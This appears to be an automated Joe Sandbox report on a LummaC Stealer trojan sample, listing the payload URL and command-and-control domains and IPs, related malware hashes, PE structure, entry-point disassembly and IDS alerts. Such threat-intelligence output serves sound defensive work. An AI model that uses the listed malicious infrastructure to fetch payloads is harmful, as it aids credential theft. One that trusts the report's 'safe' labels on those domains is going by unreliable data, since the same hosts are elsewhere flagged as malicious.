00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://h1.mockupeastcoast.shop/shark.binO#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://bxattlepath.digital/ogdaR#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org?q=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bxattlepath.digital/#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://ocsp.rootca1.amazontrust.com0:#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bxattlepath.digital/ogdaV#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494691707.000000000071A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.000000000071A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494713147.0000000000720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://bxattlepath.digital/:#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://bxattlepath.digital/b#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.ecosia.org/newtab/v20#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://duckduckgo.com/chrome_newtabv20#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                                                            high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://gemini.google.com/app?q=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ocsp.sectigo.com0B#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  89.169.54.153
                                                                                  h1.mockupeastcoast.shopRussian Federation
                                                                                  31514INF-NET-ASRUfalse
                                                                                  172.67.157.7
                                                                                  bxattlepath.digitalUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1664105
                                                                                  Start date and time:2025-04-13 17:02:13 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 16s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:11
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                  renamed because original name is a hash value
                                                                                  Original Sample Name:_patched.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 97%
                                                                                  • Number of executed functions: 63
                                                                                  • Number of non-executed functions: 213
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 23.76.34.6, 204.79.197.222, 20.12.23.50
                                                                                  • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  11:03:30API Interceptor9x Sleep call for process: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  89.169.54.153Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        h1.mockupeastcoast.shopSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 89.169.54.153
                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 89.169.54.153
                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 89.169.54.153
                                                                                        Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.62.250
                                                                                        setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.62.250
                                                                                        Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.62.250
                                                                                        Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.141.59
                                                                                        setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.141.59
                                                                                        Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.62.250
                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.141.59
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        INF-NET-ASRUSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 89.169.54.153
                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 89.169.54.153
                                                                                        resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                        • 83.217.197.148
                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 89.169.54.153
                                                                                        utorrent_installer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 83.217.202.106
                                                                                        resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                        • 83.217.222.149
                                                                                        MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zipGet hashmaliciousUnknownBrowse
                                                                                        • 83.217.208.151
                                                                                        jPKFh06jHI.exeGet hashmaliciousVidarBrowse
                                                                                        • 83.217.208.144
                                                                                        http://www.delawarejellystone.comGet hashmaliciousUnknownBrowse
                                                                                        • 89.169.52.197
                                                                                        m4n1AQRhaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 83.217.209.253
                                                                                        CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.5.162
                                                                                        Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.131.70
                                                                                        shegivenmekissinglips.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        smss (2).exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.96.1
                                                                                        KUzGUp4xs6.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        Mi5cEY8M3R.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        6pCmlKafCF.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        1b3pICGT3V.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        TpDkwibRvg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.112.1
                                                                                        WTGK44DBns.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.48.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        activate.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        activate.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        OGF4TzdXZ9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        SecuriteInfo.com.FileRepMalware.5979.10698.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        Nepomuk.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        RE_0078234567965441.pdf.wsfGet hashmaliciousKoadicBrowse
                                                                                        • 172.67.157.7
                                                                                        Rd_client_w_a_s_d.exeGet hashmaliciousHTMLPhisher, LummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        Rd_client_w_a_s_d.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.157.7
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.13758628639177
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        File size:866'816 bytes
                                                                                        MD5:cb0642ac717f55a8aac26b51fa96151d
                                                                                        SHA1:fd2fdcf2d3f048fe90bed0217f4318c7c33a8446
                                                                                        SHA256:04248506f0dca37b8eddfeeae66c70dca3009a97247c3e5170db66b53ddf45fa
                                                                                        SHA512:cb8edef783aa3fce93d9c653e837ff2247da3871fdee7d01c3ba42ed7d8cb10e5af4eeb78e00f34a9c05a0f9f471f0a9ecfb4ce61eeb54a0d4f494ba441c6465
                                                                                        SSDEEP:24576:Bj7O0GqeykpUg8nWBsSjrpEwOf5FL+976:BjCrZ8n8sSjqFfn
                                                                                        TLSH:9805AF11BF7DD0B2E60386B50DBBEB19193AD620573999C3F3D80A5A4E152E17A3930F
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.h...;...;...;KG_;...;.p\;...;.pM;...;.pJ;c..;...;...;...;...;.pC;...;.pX;...;Rich...;........PE..L.....[M...................
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x4350ea
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x4D5BD5E8 [Wed Feb 16 13:49:28 2011 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:0
                                                                                        File Version Major:5
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:7b2997a8c0eb02c7c49d90436d73e91a
                                                                                        Instruction
                                                                                        call 00007F47CCE40CC8h
                                                                                        jmp 00007F47CCE37DD9h
                                                                                        mov edi, edi
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                        push esi
                                                                                        mov esi, ecx
                                                                                        mov byte ptr [esi+0Ch], 00000000h
                                                                                        test eax, eax
                                                                                        jne 00007F47CCE37F95h
                                                                                        call 00007F47CCE3F9A1h
                                                                                        mov dword ptr [esi+08h], eax
                                                                                        mov ecx, dword ptr [eax+6Ch]
                                                                                        mov dword ptr [esi], ecx
                                                                                        mov ecx, dword ptr [eax+68h]
                                                                                        mov dword ptr [esi+04h], ecx
                                                                                        mov ecx, dword ptr [esi]
                                                                                        cmp ecx, dword ptr [004737D0h]
                                                                                        je 00007F47CCE37F44h
                                                                                        mov ecx, dword ptr [004736E8h]
                                                                                        test dword ptr [eax+70h], ecx
                                                                                        jne 00007F47CCE37F39h
                                                                                        call 00007F47CCE3AD18h
                                                                                        mov dword ptr [esi], eax
                                                                                        mov eax, dword ptr [esi+04h]
                                                                                        cmp eax, dword ptr [00473D18h]
                                                                                        je 00007F47CCE37F48h
                                                                                        mov eax, dword ptr [esi+08h]
                                                                                        mov ecx, dword ptr [004736E8h]
                                                                                        test dword ptr [eax+70h], ecx
                                                                                        jne 00007F47CCE37F3Ah
                                                                                        call 00007F47CCE40F1Fh
                                                                                        mov dword ptr [esi+04h], eax
                                                                                        mov eax, dword ptr [esi+08h]
                                                                                        test byte ptr [eax+70h], 00000002h
                                                                                        jne 00007F47CCE37F46h
                                                                                        or dword ptr [eax+70h], 02h
                                                                                        mov byte ptr [esi+0Ch], 00000001h
                                                                                        jmp 00007F47CCE37F3Ch
                                                                                        mov ecx, dword ptr [eax]
                                                                                        mov dword ptr [esi], ecx
                                                                                        mov eax, dword ptr [eax+04h]
                                                                                        mov dword ptr [esi+04h], eax
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        mov edi, edi
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        mov edx, dword ptr [ebp+0Ch]
                                                                                        push esi
                                                                                        mov esi, dword ptr [ebp+08h]
                                                                                        push edi
                                                                                        movzx eax, byte ptr [esi]
                                                                                        lea ecx, dword ptr [eax-41h]
                                                                                        inc esi
                                                                                        cmp ecx, 19h
                                                                                        jnbe 00007F47CCE37F35h
                                                                                        add eax, 20h
                                                                                        movzx ecx, byte ptr [edx]
                                                                                        lea edi, dword ptr [ecx-41h]
                                                                                        inc edx
                                                                                        cmp edi, 19h
                                                                                        jnbe 00007F47CCE37F35h
                                                                                        add ecx, 20h
                                                                                        test eax, eax
                                                                                        je 00007F47CCE37F36h
                                                                                        cmp eax, ecx
                                                                                        je 00007F47CCE37F0Ch
                                                                                        pop edi
                                                                                        sub eax, ecx
                                                                                        Programming Language:
                                                                                        • [ASM] VS2008 SP1 build 30729
                                                                                        • [C++] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2005 build 50727
                                                                                        • [LNK] VS2008 SP1 build 30729
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x726fc0x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x830000x1b4.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000x8a50.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x5d3700x1c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x689000x40.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x5d0000x14c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x5b93a0x5ba0050e8a179d1e63220a19ce9b15e89db9bFalse0.47480388813096863data6.688292002187406IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x5d0000x15e7e0x1600003401a72f28ab6174e6c44ca51e0ad53False0.35771040482954547data5.166079207834812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x730000xf6e40xd800ce50be183a177ae2449abb9c50cbb746False0.06718388310185185data1.4646929400389537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x830000x1b40x200c1a699aa15354d6ed118ffeb9aec2718False0.486328125data5.107242909879373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x840000x4e4000x4e4009c61ea802d930318809980bfdc121800False0.9231978833865815data7.9241746770983434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x830580x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                                                                        DLLImport
                                                                                        KERNEL32.dllGetFileAttributesExA, CreateFileA, SetFilePointerEx, WriteFile, ReadFile, CloseHandle, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, GetProcAddress, ExitProcess, GetCommandLineA, HeapAlloc, HeapReAlloc, GetTimeZoneInformation, GetSystemTimeAsFileTime, GetCPInfo, RtlUnwind, RaiseException, LCMapStringA, LCMapStringW, HeapCreate, VirtualFree, VirtualAlloc, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, GetModuleFileNameA, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetModuleHandleA, SetFilePointer, GetLocaleInfoW, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2025-04-13T17:03:08.964479+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973089.169.54.153443TCP
                                                                                        2025-04-13T17:03:30.611373+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449721172.67.157.7443TCP
                                                                                        2025-04-13T17:03:33.177726+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449723172.67.157.7443TCP
                                                                                        2025-04-13T17:03:34.437276+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449724172.67.157.7443TCP
                                                                                        2025-04-13T17:03:35.957124+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449725172.67.157.7443TCP
                                                                                        2025-04-13T17:03:40.731669+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449726172.67.157.7443TCP
                                                                                        2025-04-13T17:03:41.664933+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449727172.67.157.7443TCP
                                                                                        2025-04-13T17:03:42.859474+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449728172.67.157.7443TCP
                                                                                        2025-04-13T17:03:44.915880+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449729172.67.157.7443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Apr 13, 2025 17:03:30.343193054 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.343282938 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:30.343380928 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.372432947 CEST49721443192.168.2.4172.67.157.7
                                                                                        Apr 13, 2025 17:03:30.372457027 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:30.611303091 CEST44349721172.67.157.7192.168.2.4
                                                                                        Apr 13, 2025 17:03:30.611372948 CEST49721443192.168.2.4172.67.157.7
